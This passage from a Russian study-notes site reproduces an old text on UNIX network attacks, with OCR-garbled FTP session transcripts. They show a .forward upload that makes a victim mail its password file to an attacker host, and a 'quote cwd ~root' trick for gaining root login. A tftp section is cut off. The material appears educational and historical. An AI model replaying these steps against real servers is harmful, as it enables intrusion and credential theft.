Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

PORT command successful



150 ASCII data connection for /bin/is (192.192.192.1,1129) (0 bytes).

Total 5

Drwxr-xr-x4 101 1 512 Jun 20 1991. drwxr-xr-x 4 101 1512 Jun 20 1991..

Drwxr-xr-x2 01 512 Jun 20 1991 bin drwxr-kr-x2 0 1512 Jun 20 1991 etc

Drwxr-xr-x 3 101 1 512 Aug 22 1991 pub

ASCII Transfer complete.

242 bytes received in 0.066 seconds (3.6 Kbytes/s)

ftp> put forward_SLicker_fl.le.forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s)

ftp> quit evil % echo test I mail ftp@vlctim. corn

Теперь хакер может просто ждать, пока файл с паролями не будет выслан ему. Очевидно, что такая атака

(как и следующая) является типичной по сценарию 2. Рассматривая ftp, вспомним совсем старую ошибку:

% ftp -п

ftp> open victim, corn

Connected to victim, corn

Victim, corn FTP-server ready.

ftp> quote user ftp

Guest login ok, send ident as password.

ftp> quote cwd "root

Please login with USER and PASS.

ftp> quote pass ftp

Guest login ok, access restrictions apply.

ftp> Is -al /

Если этот прием сработал, то атакующий теперь вошел в систему как суперпользователь. Далее мы

рассмотрим более свежие <дыры> в ftp-демонах.

Использование tftp

До сих пор существует (но почти не используется, по крайней мере в глобальных сетях) программа, подобная

Ftpd, - tftpd. Этот демон не требует пароля для аутентификации. Если хост предоставлял tftp без ограничения

Доступа (обычно с помощью установок флагов безопасности в файле inetd.conf), то атакующий получал





Дата публикования: 2014-11-04; Прочитано: 339 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.008 с)...